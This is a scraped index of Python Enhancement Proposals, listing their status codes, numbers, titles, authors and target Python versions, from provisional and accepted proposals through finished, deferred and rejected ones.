Provisional PEPs (provisionally accepted; interface may still change)

PEP | Title | Authors | Python version
SP639Improving License Clarity with Better Package MetadataPhilippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP708Extending the Repository API to Mitigate Dependency Confusion AttacksDonald Stufft

Accepted PEPs (accepted; may not be implemented yet)

PEP | Title | Authors | Python version
SA458Secure PyPI downloads with signed repository metadataTrishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA563Postponed Evaluation of AnnotationsŁukasz Langa3.7
SA590Vectorcall: a fast calling protocol for CPythonMark Shannon, Jeroen Demeyer3.8
SA625Filename of a Source DistributionTzu-ping Chung, Paul Moore
SA649Deferred Evaluation Of Annotations Using DescriptorsLarry Hastings3.14
SA658Serve Distribution Metadata in the Simple Repository APITzu-ping Chung
SA668Marking Python base environments as “externally managed”Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA685Comparison of extra names for optional distribution dependenciesBrett Cannon
SA686Make UTF-8 mode defaultInada Naoki3.15
SA687Isolating modules in the standard libraryErlend Egeberg Aasland, Petr Viktorin3.12
SA691JSON-based Simple API for Python Package IndexesDonald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA699Remove private dict version field added in PEP 509Ken Jin3.12
SA701Syntactic formalization of f-stringsPablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta Gómez Macías3.12
SA703Making the Global Interpreter Lock Optional in CPythonSam Gross3.13
SA714Rename dist-info-metadata in the Simple APIDonald Stufft
SA735Dependency Groups in pyproject.tomlStephen Rosen
SA753Uniform project URLs in core metadataWilliam Woodruff, Facundo Tuesca

Open PEPs (under consideration)

PEP | Title | Authors | Python version
S467Minor API improvements for binary sequencesAlyssa Coghlan, Ethan Furman3.13
S480Surviving a Compromise of PyPI: End-to-end signing of packagesTrishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S603Adding a frozenmap type to collectionsYury Selivanov
S638Syntactic MacrosMark Shannon
S653Precise Semantics for Pattern MatchingMark Shannon
S661Sentinel ValuesTal Einat
S671Syntax for late-bound function argument defaultsChris Angelico3.12
S679Allow parentheses in assert statementsPablo Galindo Salgado3.12
S694Upload 2.0 API for Python Package RepositoriesDonald Stufft
S710Recording the provenance of installed packagesFridolín Pokorný
S711PyBI: a standard format for distributing Python BinariesNathaniel J. Smith
S718Subscriptable functionsJames Hilton-Balfe3.13
I720Cross-compiling Python packagesFilipe Laíns3.12
S725Specifying external dependencies in pyproject.tomlPradyun Gedam, Ralf Gommers
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
S736Shorthand syntax for keyword arguments at invocationJoshua Bambrick, Chris Angelico3.14
S739Static description file for build details of Python installationsFilipe Laíns3.14
S743Add Py_COMPAT_API_VERSION to the Python C APIVictor Stinner, Petr Viktorin3.14
I744JIT CompilationBrandt Bucher, Savannah Ostrowski3.13
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S748A Unified TLS API for PythonJoop van de Pol, William Woodruff3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S750Template StringsJim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck3.14
S751A file format to record Python dependencies for installation reproducibilityBrett Cannon
S752Implicit namespaces for package repositoriesOfek Lev
P755Implicit namespace policy for PyPIOfek Lev
S758Allow except and except* expressions without parenthesesPablo Galindo, Brett Cannon3.14
S759External Wheel HostingBarry Warsaw, Ethan Smith
S763Limiting deletions on PyPIWilliam Woodruff, Alexis Challande
S765Disallow return/break/continue that exit a finally blockIrit Katriel, Alyssa Coghlan3.14
I766Explicit Priority Choices Among Multiple IndexesMichael Sarahan
S767Annotating Read-Only AttributesEneg3.14
S768Safe external debugger interface for CPythonPablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic3.14
S777How to Re-invent the WheelEthan Smith
S789Preventing task-cancellation bugs by limiting yield in async generatorsZac Hatfield-Dodds, Nathaniel J. Smith3.14
P2026Calendar versioning for PythonHugo van Kemenade3.26

Finished PEPs (done, with a stable interface)

PEP | Title | Authors | Python version
SF100Python Unicode IntegrationMarc-André Lemburg2.0
SF201Lockstep IterationBarry Warsaw2.0
SF202List ComprehensionsBarry Warsaw2.0
SF203Augmented AssignmentsThomas Wouters2.0
SF205Weak ReferencesFred L. Drake, Jr.2.1
SF207Rich ComparisonsGuido van Rossum, David Ascher2.1
SF208Reworking the Coercion ModelNeil Schemenauer, Marc-André Lemburg2.1
SF214Extended Print StatementBarry Warsaw2.0
SF217Display Hook for Interactive UseMoshe Zadka2.1
SF218Adding a Built-In Set Object TypeGreg Wilson, Raymond Hettinger2.2
SF221Import AsThomas Wouters2.0
SF223Change the Meaning of \x EscapesTim Peters2.0
SF227Statically Nested ScopesJeremy Hylton2.1
SF229Using Distutils to Build PythonA.M. Kuchling2.1
SF230Warning FrameworkGuido van Rossum2.1
SF232Function AttributesBarry Warsaw2.1
SF234IteratorsKa-Ping Yee, Guido van Rossum2.1
SF235Import on Case-Insensitive PlatformsTim Peters2.1
SF236Back to the __future__Tim Peters2.1
SF237Unifying Long Integers and IntegersMoshe Zadka, Guido van Rossum2.2
SF238Changing the Division OperatorMoshe Zadka, Guido van Rossum2.2
SF250Using site-packages on WindowsPaul Moore2.2
SF252Making Types Look More Like ClassesGuido van Rossum2.2
SF253Subtyping Built-in TypesGuido van Rossum2.2
SF255Simple GeneratorsNeil Schemenauer, Tim Peters, Magnus Lie Hetland2.2
SF260Simplify xrange()Guido van Rossum2.2
SF261Support for “wide” Unicode charactersPaul Prescod2.2
SF263Defining Python Source Code EncodingsMarc-André Lemburg, Martin von Löwis2.3
SF264Future statements in simulated shellsMichael Hudson2.2
SF273Import Modules from Zip ArchivesJames C. Ahlstrom2.3
SF274Dict ComprehensionsBarry Warsaw2.7, 3.0
SF277Unicode file name support for Windows NTNeil Hodgson2.3
SF278Universal Newline SupportJack Jansen2.3
SF279The enumerate() built-in functionRaymond Hettinger2.3
SF282A Logging SystemVinay Sajip, Trent Mick2.3
SF285Adding a bool typeGuido van Rossum2.3
SF289Generator ExpressionsRaymond Hettinger2.4
SF292Simpler String SubstitutionsBarry Warsaw2.4
SF293Codec Error Handling CallbacksWalter Dörwald2.3
SF301Package Index and Metadata for DistutilsRichard Jones2.3
SF302New Import HooksJust van Rossum, Paul Moore2.3
SF305CSV File APIKevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells2.3
SF307Extensions to the pickle protocolGuido van Rossum, Tim Peters2.3
SF308Conditional ExpressionsGuido van Rossum, Raymond Hettinger2.5
SF309Partial Function ApplicationPeter Harris2.5
SF311Simplified Global Interpreter Lock Acquisition for ExtensionsMark Hammond2.3
SF318Decorators for Functions and MethodsKevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter2.4
SF322Reverse IterationRaymond Hettinger2.4
SF324subprocess - New process modulePeter Astrand2.4
SF327Decimal Data TypeFacundo Batista2.4
SF328Imports: Multi-Line and Absolute/RelativeAahz2.4, 2.5, 2.6
SF331Locale-Independent Float/String ConversionsChristian R. Reis2.4
SF338Executing modules as scriptsAlyssa Coghlan2.5
SF341Unifying try-except and try-finallyGeorg Brandl2.5
SF342Coroutines via Enhanced GeneratorsGuido van Rossum, Phillip J. Eby2.5
SF343The “with” StatementGuido van Rossum, Alyssa Coghlan2.5
SF352Required Superclass for ExceptionsBrett Cannon, Guido van Rossum2.5
SF353Using ssize_t as the index typeMartin von Löwis2.5
SF357Allowing Any Object to be Used for SlicingTravis Oliphant2.5
SF358The “bytes” ObjectNeil Schemenauer, Guido van Rossum2.6, 3.0
SF362Function Signature ObjectBrett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings3.3
SF366Main module explicit relative importsAlyssa Coghlan2.6, 3.0
SF370Per user site-packages directoryChristian Heimes2.6, 3.0
SF371Addition of the multiprocessing package to the standard libraryJesse Noller, Richard Oudkerk2.6, 3.0
SF372Adding an ordered dictionary to collectionsArmin Ronacher, Raymond Hettinger2.7, 3.1
SF376Database of Installed Python DistributionsTarek Ziadé2.7, 3.2
SF378Format Specifier for Thousands SeparatorRaymond Hettinger2.7, 3.1
SF380Syntax for Delegating to a SubgeneratorGregory Ewing3.3
SF383Non-decodable Bytes in System Character InterfacesMartin von Löwis3.1
SF384Defining a Stable ABIMartin von Löwis3.2
SF389argparse - New Command Line Parsing ModuleSteven Bethard2.7, 3.2
SF391Dictionary-Based Configuration For LoggingVinay Sajip2.7, 3.2
SF393Flexible String RepresentationMartin von Löwis3.3
SF397Python launcher for WindowsMark Hammond, Martin von Löwis3.3
SF405Python Virtual EnvironmentsCarl Meyer3.3
SF409Suppressing exception contextEthan Furman3.3
SF412Key-Sharing DictionaryMark Shannon3.3
SF414Explicit Unicode Literal for Python 3.3Armin Ronacher, Alyssa Coghlan3.3
SF415Implement context suppression with exception attributesBenjamin Peterson3.3
SF417Including mock in the Standard LibraryMichael Foord3.3
SF418Add monotonic time, performance counter, and process time functionsCameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner3.3
SF420Implicit Namespace PackagesEric V. Smith3.3
SF421Adding sys.implementationEric Snow3.3
SF424A method for exposing a length hintAlex Gaynor3.4
SF425Compatibility Tags for Built DistributionsDaniel Holth3.4
SF427The Wheel Binary Package Format 1.0Daniel Holth
SF428The pathlib module – object-oriented filesystem pathsAntoine Pitrou3.4
SF435Adding an Enum type to the Python standard libraryBarry Warsaw, Eli Bendersky, Ethan Furman3.4
SF436The Argument Clinic DSLLarry Hastings3.4
SF440Version Identification and Dependency SpecificationAlyssa Coghlan, Donald Stufft
SF441Improving Python ZIP Application SupportDaniel Holth, Paul Moore3.5
SF442Safe object finalizationAntoine Pitrou3.4
SF443Single-dispatch generic functionsŁukasz Langa3.4
SF445Add new APIs to customize Python memory allocatorsVictor Stinner3.4
SF446Make newly created file descriptors non-inheritableVictor Stinner3.4
SF448Additional Unpacking GeneralizationsJoshua Landau3.5
SF450Adding A Statistics Module To The Standard LibrarySteven D’Aprano3.4
SF451A ModuleSpec Type for the Import SystemEric Snow3.4
SF453Explicit bootstrapping of pip in Python installationsDonald Stufft, Alyssa Coghlan
SF454Add a new tracemalloc module to trace Python memory allocationsVictor Stinner3.4
SF456Secure and interchangeable hash algorithmChristian Heimes3.4
SF461Adding % formatting to bytes and bytearrayEthan Furman3.5
SF465A dedicated infix operator for matrix multiplicationNathaniel J. Smith3.5
SF466Network Security Enhancements for Python 2.7.xAlyssa Coghlan2.7.9
SF468Preserving the order of **kwargs in a function.Eric Snow3.6
SF471os.scandir() function – a better and faster directory iteratorBen Hoyt3.5
SF475Retry system calls failing with EINTRCharles-François Natali, Victor Stinner3.5
SF476Enabling certificate verification by default for stdlib http clientsAlex Gaynor2.7.9, 3.4.3, 3.5
SF477Backport ensurepip (PEP 453) to Python 2.7Donald Stufft, Alyssa Coghlan
SF479Change StopIteration handling inside generatorsChris Angelico, Guido van Rossum3.5
SF484Type HintsGuido van Rossum, Jukka Lehtosalo, Łukasz Langa3.5
SF485A Function for testing approximate equalityChristopher Barker3.5
SF486Make the Python Launcher aware of virtual environmentsPaul Moore3.5
SF487Simpler customisation of class creationMartin Teichmann3.6
SF488Elimination of PYO filesBrett Cannon3.5
SF489Multi-phase extension module initializationPetr Viktorin, Stefan Behnel, Alyssa Coghlan3.5
SF492Coroutines with async and await syntaxYury Selivanov3.5
SF493HTTPS verification migration tools for Python 2.7Alyssa Coghlan, Robert Kuska, Marc-André Lemburg2.7.12
SF495Local Time DisambiguationAlexander Belopolsky, Tim Peters3.6
SF498Literal String InterpolationEric V. Smith3.6
SF503Simple Repository APIDonald Stufft
SF506Adding A Secrets Module To The Standard LibrarySteven D’Aprano3.6
SF508Dependency specification for Python Software PackagesRobert Collins
SF515Underscores in Numeric LiteralsGeorg Brandl, Serhiy Storchaka3.6
SF517A build-system independent format for source treesNathaniel J. Smith, Thomas Kluyver
SF518Specifying Minimum Build System Requirements for Python ProjectsBrett Cannon, Nathaniel J. Smith, Donald Stufft
SF519Adding a file system path protocolBrett Cannon, Koos Zevenhoven3.6
SF520Preserving Class Attribute Definition OrderEric Snow3.6
SF523Adding a frame evaluation API to CPythonBrett Cannon, Dino Viehland3.6
SF524Make os.urandom() blocking on LinuxVictor Stinner3.6
SF525Asynchronous GeneratorsYury Selivanov3.6
SF526Syntax for Variable AnnotationsRyan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum3.6
SF527Removing Un(der)used file types/extensions on PyPIDonald Stufft
SF528Change Windows console encoding to UTF-8Steve Dower3.6
SF529Change Windows filesystem encoding to UTF-8Steve Dower3.6
SF530Asynchronous ComprehensionsYury Selivanov3.6
SF538Coercing the legacy C locale to a UTF-8 based localeAlyssa Coghlan3.7
SF539A New C-API for Thread-Local Storage in CPythonErik M. Bray, Masayuki Yamamoto3.7
SF540Add a new UTF-8 ModeVictor Stinner3.7
SF544Protocols: Structural subtyping (static duck typing)Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa3.8
SF552Deterministic pycsBenjamin Peterson3.7
SF553Built-in breakpoint()Barry Warsaw3.7
SF557Data ClassesEric V. Smith3.7
SF560Core support for typing module and generic typesIvan Levkivskyi3.7
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF562Module __getattr__ and __dir__Ivan Levkivskyi3.7
SF564Add new time functions with nanosecond resolutionVictor Stinner3.7
SF565Show DeprecationWarning in __main__Alyssa Coghlan3.7
SF566Metadata for Python Software Packages 2.1Dustin Ingram3.x
SF567Context VariablesYury Selivanov3.7
SF570Python Positional-Only ParametersLarry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele3.8
SF572Assignment ExpressionsChris Angelico, Tim Peters, Guido van Rossum3.8
SF573Module State Access from C Extension MethodsPetr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch3.9
SF574Pickle protocol 5 with out-of-band dataAntoine Pitrou3.8
SF578Python Runtime Audit HooksSteve Dower3.8
SF584Add Union Operators To dictSteven D’Aprano, Brandt Bucher3.9
SF585Type Hinting Generics In Standard CollectionsŁukasz Langa3.9
SF586Literal TypesMichael Lee, Ivan Levkivskyi, Jukka Lehtosalo3.8
SF587Python Initialization ConfigurationVictor Stinner, Alyssa Coghlan3.8
SF589TypedDict: Type Hints for Dictionaries with a Fixed Set of KeysJukka Lehtosalo3.8
SF591Adding a final qualifier to typingMichael J. Sullivan, Ivan Levkivskyi3.8
SF592Adding “Yank” Support to the Simple APIDonald Stufft
SF593Flexible function and variable annotationsTill Varoquaux, Konstantin Kashin3.9
SF594Removing dead batteries from the standard libraryChristian Heimes, Brett Cannon3.11
SF597Add optional EncodingWarningInada Naoki3.10
SF600Future ‘manylinux’ Platform Tags for Portable Linux Built DistributionsNathaniel J. Smith, Thomas Kluyver
SF604Allow writing union types as X | YPhilippe PRADOS, Maggie Moss3.10
SF610Recording the Direct URL Origin of installed distributionsStéphane Bidoul, Chris Jerdonek
SF612Parameter Specification VariablesMark Mendoza3.10
SF613Explicit Type AliasesShannon Zhu3.10
SF614Relaxing Grammar Restrictions On DecoratorsBrandt Bucher3.9
SF615Support for the IANA Time Zone Database in the Standard LibraryPaul Ganssle3.9
SF616String methods to remove prefixes and suffixesDennis Sweeney3.9
SF617New PEG parser for CPythonGuido van Rossum, Pablo Galindo, Lysandros Nikolaou3.9
SF618Add Optional Length-Checking To zipBrandt Bucher3.10
SF621Storing project metadata in pyproject.tomlBrett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF623Remove wstr from UnicodeInada Naoki3.10
SF624Remove Py_UNICODE encoder APIsInada Naoki3.11
SF626Precise line numbers for debugging and other tools.Mark Shannon3.10
SF627Recording installed projectsPetr Viktorin
SF628Add math.tauAlyssa Coghlan3.6
SF629Versioning PyPI’s Simple APIDonald Stufft
SF632Deprecate distutils moduleSteve Dower3.10
SF634Structural Pattern Matching: SpecificationBrandt Bucher, Guido van Rossum3.10
SF643Metadata for Package Source DistributionsPaul Moore
SF644Require OpenSSL 1.1.1 or newerChristian Heimes3.10
SF646Variadic GenericsMark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles3.11
SF647User-Defined Type GuardsEric Traut3.10
SF652Maintaining the Stable ABIPetr Viktorin3.10
SF654Exception Groups and except*Irit Katriel, Yury Selivanov, Guido van Rossum3.11
SF655Marking individual TypedDict items as required or potentially-missingDavid Foster3.11
SF656Platform Tag for Linux Distributions Using MuslTzu-ping Chung
SF657Include Fine Grained Error Locations in TracebacksPablo Galindo, Batuhan Taskaya, Ammar Askar3.11
SF660Editable installs for pyproject.toml based builds (wheel based)Daniel Holth, Stéphane Bidoul
SF667Consistent views of namespacesMark Shannon, Tian Gao3.13
SF669Low Impact Monitoring for CPythonMark Shannon3.12
SF670Convert macros to functions in the Python C APIErlend Egeberg Aasland, Victor Stinner3.11
SF673Self TypePradeep Kumar Srinivasan, James Hilton-Balfe3.11
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
SF678Enriching Exceptions with NotesZac Hatfield-Dodds3.11
SF680tomllib: Support for Parsing TOML in the Standard LibraryTaneli Hukkinen, Shantanu Jain3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF682Format Specifier for Signed ZeroJohn Belmonte3.11
SF683Immortal Objects, Using a Fixed RefcountEric Snow, Eddie Elizondo3.12
SF684A Per-Interpreter GILEric Snow3.12
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF689Unstable C API tierPetr Viktorin3.12
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF697Limited C API for Extending Opaque TypesPetr Viktorin3.12
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SF700Additional Fields for the Simple API for Package IndexesPaul Moore
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF706Filter for tarfile.extractallPetr Viktorin3.12
SF709Inlined comprehensionsCarl Meyer3.12
SF715Disabling bdist_egg distribution uploads on PyPIWilliam Woodruff
SF721Using tarfile.data_filter for source distribution extractionPetr Viktorin3.12
SF723Inline script metadataOfek Lev
SF730Adding iOS as a supported platformRussell Keith-Magee3.13
SF737C API to format a type fully qualified nameVictor Stinner3.13
SF738Adding Android as a supported platformMalcolm Smith3.13
SF740Index support for digital attestationsWilliam Woodruff, Facundo Tuesca, Dustin Ingram
SF741Python Configuration C APIVictor Stinner3.14
SF742Narrowing types with TypeIsJelle Zijlstra3.13
SF757C API to import-export Python integersSergey B Kirpichev, Victor Stinner3.14
SF3101Advanced String FormattingTalin3.0
SF3102Keyword-Only ArgumentsTalin3.0
SF3104Access to Names in Outer ScopesKa-Ping Yee3.0
SF3105Make print a functionGeorg Brandl3.0
SF3106Revamping dict.keys(), .values() and .items()Guido van Rossum3.0
SF3107Function AnnotationsCollin Winter, Tony Lownds3.0
SF3108Standard Library ReorganizationBrett Cannon3.0
SF3109Raising Exceptions in Python 3000Collin Winter3.0
SF3110Catching Exceptions in Python 3000Collin Winter3.0
SF3111Simple input built-in in Python 3000Andre Roberge3.0
SF3112Bytes literals in Python 3000Jason Orendorff3.0
SF3113Removal of Tuple Parameter UnpackingBrett Cannon3.0
SF3114Renaming iterator.next() to iterator.__next__()Ka-Ping Yee3.0
SF3115Metaclasses in Python 3000Talin3.0
SF3116New I/ODaniel Stutzbach, Guido van Rossum, Mike Verdone3.0
SF3118Revising the buffer protocolTravis Oliphant, Carl Banks3.0
SF3119Introducing Abstract Base ClassesGuido van Rossum, Talin3.0
SF3120Using UTF-8 as the default source encodingMartin von Löwis3.0
SF3121Extension Module Initialization and FinalizationMartin von Löwis3.0
SF3123Making PyObject_HEAD conform to standard CMartin von Löwis3.0
SF3127Integer Literal Support and SyntaxPatrick Maupin3.0
SF3129Class DecoratorsCollin Winter3.0
SF3131Supporting Non-ASCII IdentifiersMartin von Löwis3.0
SF3132Extended Iterable UnpackingGeorg Brandl3.0
SF3134Exception Chaining and Embedded TracebacksKa-Ping Yee3.0
SF3135New SuperCalvin Spealman, Tim Delaney, Lie Ryan3.0
SF3137Immutable Bytes and Mutable BufferGuido van Rossum3.0
SF3138String representation in Python 3000Atsuo Ishimoto3.0
SF3141A Type Hierarchy for NumbersJeffrey Yasskin3.0
SF3144IP Address Manipulation Library for the Python Standard LibraryPeter Moody3.3
SF3147PYC Repository DirectoriesBarry Warsaw3.2
SF3148futures - execute computations asynchronouslyBrian Quinlan3.2
SF3149ABI version tagged .so filesBarry Warsaw3.2
SF3151Reworking the OS and IO exception hierarchyAntoine Pitrou3.3
SF3154Pickle protocol version 4Antoine Pitrou3.4
SF3155Qualified name for classes and functionsAntoine Pitrou3.3
SF3156Asynchronous IO Support Rebooted: the “asyncio” ModuleGuido van Rossum3.3

Historical Meta-PEPs and Informational PEPs

PEP | Title | Authors | Python version
PS5Guidelines for Language EvolutionPaul Prescod
PS6Bug Fix ReleasesAahz, Anthony Baxter
IF160Python 1.6 Release ScheduleFred L. Drake, Jr.1.6
IF200Python 2.0 Release ScheduleJeremy Hylton2.0
IF226Python 2.1 Release ScheduleJeremy Hylton2.1
IF251Python 2.2 Release ScheduleBarry Warsaw, Guido van Rossum2.2
IF283Python 2.3 Release ScheduleGuido van Rossum2.3
IF320Python 2.4 Release ScheduleBarry Warsaw, Raymond Hettinger, Anthony Baxter2.4
PF347Migrating the Python CVS to SubversionMartin von Löwis
IF356Python 2.5 Release ScheduleNeal Norwitz, Guido van Rossum, Anthony Baxter2.5
PF360Externally Maintained PackagesBrett Cannon
IF361Python 2.6 and 3.0 Release ScheduleNeal Norwitz, Barry Warsaw2.6, 3.0
IF373Python 2.7 Release ScheduleBenjamin Peterson2.7
PF374Choosing a distributed VCS for the Python projectBrett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF375Python 3.1 Release ScheduleBenjamin Peterson3.1
PF385Migrating from Subversion to MercurialDirkjan Ochtman, Antoine Pitrou, Georg Brandl
IF392Python 3.2 Release ScheduleGeorg Brandl3.2
IF398Python 3.3 Release ScheduleGeorg Brandl3.3
IF404Python 2.8 Un-release ScheduleBarry Warsaw2.8
IF429Python 3.4 Release ScheduleLarry Hastings3.4
PS438Transitioning to release-file hosting on PyPIHolger Krekel, Carl Meyer
PF449Removal of the PyPI Mirror Auto Discovery and Naming SchemeDonald Stufft
PF464Removal of the PyPI Mirror Authenticity APIDonald Stufft
PF470Removing External Hosting Support on PyPIDonald Stufft
IF478Python 3.5 Release ScheduleLarry Hastings3.5
IF494Python 3.6 Release ScheduleNed Deily3.6
PF512Migrating from hg.python.org to GitHubBrett Cannon
IF537Python 3.7 Release ScheduleNed Deily3.7
PF541Package Index Name RetentionŁukasz Langa
IF569Python 3.8 Release ScheduleŁukasz Langa3.8
PF581Using GitHub Issues for CPythonMariatta
PF3000Python 3000Guido van Rossum
PF3002Procedure for Backwards-Incompatible ChangesSteven Bethard
PF3003Python Language MoratoriumBrett Cannon, Jesse Noller, Guido van Rossum
PF3099Things that will Not Change in Python 3000Georg Brandl
PF3100Miscellaneous Python 3.0 PlansBrett Cannon
PF8001Python Governance Voting ProcessBrett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware

Deferred PEPs (postponed pending further research or updates)

PEP | Title | Authors | Python version
SD213Attribute Access HandlersPaul Prescod2.1
SD219Stackless PythonGordon McMillan2.1
SD222Web Library EnhancementsA.M. Kuchling2.1
SD233Python Online HelpPaul Prescod2.1
SD267Optimized Access to Module NamespacesJeremy Hylton2.2
SD269Pgen Module for PythonJonathan Riehl2.2
SD280Optimizing access to globalsGuido van Rossum2.3
SD286Enhanced Argument TuplesMartin von Löwis2.3
SD312Simple Implicit LambdaRoman Suzi, Alex Martelli2.4
SD316Programming by Contract for PythonTerence Way
SD323Copyable IteratorsAlex Martelli2.5
SD337Logging Usage in the Standard LibraryMichael P. Dubner2.5
SD368Standard image protocol and classLino Mastrodomenico2.6, 3.0
SD400Deprecate codecs.StreamReader and codecs.StreamWriterVictor Stinner3.3
SD403General purpose decorator clause (aka “@in” clause)Alyssa Coghlan3.4
PD407New release cycle and introducing long-term support versionsAntoine Pitrou, Georg Brandl, Barry Warsaw
SD419Protecting cleanup statements from interruptionsPaul Colomiets3.3
ID423Naming conventions and recipes related to packagingBenoit Bryon
ID444Python Web3 InterfaceChris McDonough, Armin Ronacher
SD447Add __getdescriptor__ method to metaclassRonald Oussoren
SD491The Wheel Binary Package Format 1.9Daniel Holth
SD499python -m foo should also bind ‘foo’ in sys.modulesCameron Simpson, Chris Angelico, Joseph Jevnik3.10
SD505None-aware operatorsMark E. Haase, Steve Dower3.8
SD532A circuit breaking protocol and binary operatorsAlyssa Coghlan, Mark E. Haase3.8
SD533Deterministic cleanup for iteratorsNathaniel J. Smith
SD534Improved Errors for Missing Standard Library ModulesTomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD535Rich comparison chainingAlyssa Coghlan3.8
SD547Running extension modules using the -m optionMarcel Plch, Petr Viktorin3.7
SD556Threaded garbage collectionAntoine Pitrou3.7
SD568Generator-sensitivity for Context VariablesNathaniel J. Smith3.8
SD674Disallow using macros as l-valuesVictor Stinner3.12
SD734Multiple Interpreters in the StdlibEric Snow3.13
SD3124Overloading, Generic Functions, Interfaces, and AdaptationPhillip J. Eby
SD3143Standard daemon process libraryBen Finney3.x
SD3150Statement local namespaces (aka “given” clause)Alyssa Coghlan3.4

Rejected, Superseded, and Withdrawn PEPs

PEP | Title | Authors | Python version
PW 3 | Guidelines for Handling Bug Reports | Jeremy Hylton
PW 9 | Sample Plaintext PEP Template | Barry Warsaw
PW 42 | Feature Requests | Jeremy Hylton
IS 102 | Doing Python Micro Releases | Anthony Baxter, Barry Warsaw, Guido van Rossum
IW 103 | Collecting information about git | Oleg Broytman
SR 204 | Range Literals | Thomas Wouters | 2.0
IW 206 | Python Advanced Library | A.M. Kuchling
SW 209 | Multi-dimensional Arrays | Paul Barrett, Travis Oliphant | 2.2
SR 210 | Decoupling the Interpreter Loop | David Ascher | 2.1
SR 211 | Adding A New Outer Product Operator | Greg Wilson | 2.1
SR 212 | Loop Counter Iteration | Peter Schneider-Kamp | 2.1
SS 215 | String Interpolation | Ka-Ping Yee | 2.1
IW 216 | Docstring Format | Moshe Zadka
IR 220 | Coroutines, Generators, Continuations | Gordon McMillan
SR 224 | Attribute Docstrings | Marc-André Lemburg | 2.1
SR 225 | Elementwise/Objectwise Operators | Huaiyu Zhu, Gregory Lielens | 2.1
SW 228 | Reworking Python’s Numeric Model | Moshe Zadka, Guido van Rossum
SR 231 | __findattr__() | Barry Warsaw | 2.1
SR 239 | Adding a Rational Type to Python | Christopher A. Craig, Moshe Zadka | 2.2
SR 240 | Adding a Rational Literal to Python | Christopher A. Craig, Moshe Zadka | 2.2
SS 241 | Metadata for Python Software Packages | A.M. Kuchling
SW 242 | Numeric Kinds | Paul F. Dubois | 2.2
SW 243 | Module Repository Upload Mechanism | Sean Reifschneider | 2.1
SR 244 | The directive statement | Martin von Löwis | 2.1
SR 245 | Python Interface Syntax | Michel Pelletier | 2.2
SR 246 | Object Adaptation | Alex Martelli, Clark C. Evans | 2.5
SR 254 | Making Classes Look More Like Types | Guido van Rossum | 2.2
SR 256 | Docstring Processing System Framework | David Goodger
SR 258 | Docutils Design Specification | David Goodger
SR 259 | Omit printing newline after newline | Guido van Rossum | 2.2
SR 262 | A Database of Installed Python Packages | A.M. Kuchling
SR 265 | Sorting Dictionaries by Value | Grant Griffin | 2.2
SW 266 | Optimizing Global Variable/Attribute Access | Skip Montanaro | 2.3
SR 268 | Extended HTTP functionality and WebDAV | Greg Stein | 2.x
SR 270 | uniq method for list objects | Jason Petrone | 2.2
SR 271 | Prefixing sys.path by command line option | Frédéric B. Giacometti | 2.2
SR 275 | Switching on Multiple Values | Marc-André Lemburg | 2.6
SR 276 | Simple Iterator for ints | Jim Althoff | 2.3
SR 281 | Loop Counter Iteration with range and xrange | Magnus Lie Hetland | 2.3
SR 284 | Integer for-loops | David Eppstein, Gregory Ewing | 2.3
SW 288 | Generators Attributes and Exceptions | Raymond Hettinger | 2.5
IS 291 | Backward Compatibility for the Python 2 Standard Library | Neal Norwitz | 2.3
SR 294 | Type Names in the types Module | Oren Tirosh | 2.5
SR 295 | Interpretation of multiline string constants | Stepan Koltsov | 3.0
SW 296 | Adding a bytes Object Type | Scott Gilbert | 2.3
SR 297 | Support for System Upgrades | Marc-André Lemburg | 2.6
SW 298 | The Locked Buffer Interface | Thomas Heller | 2.3
SR 299 | Special __main__() function in modules | Jeff Epler | 2.3
SR 303 | Extend divmod() for Multiple Divisors | Thomas Bellman | 2.3
SW 304 | Controlling Generation of Bytecode Files | Skip Montanaro
IW 306 | How to Change Python’s Grammar | Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SR 310 | Reliable Acquisition/Release Pairs | Michael Hudson, Paul Moore | 2.4
SR 313 | Adding Roman Numeral Literals to Python | Mike Meyer | 2.4
SS 314 | Metadata for Python Software Packages 1.1 | A.M. Kuchling, Richard Jones | 2.5
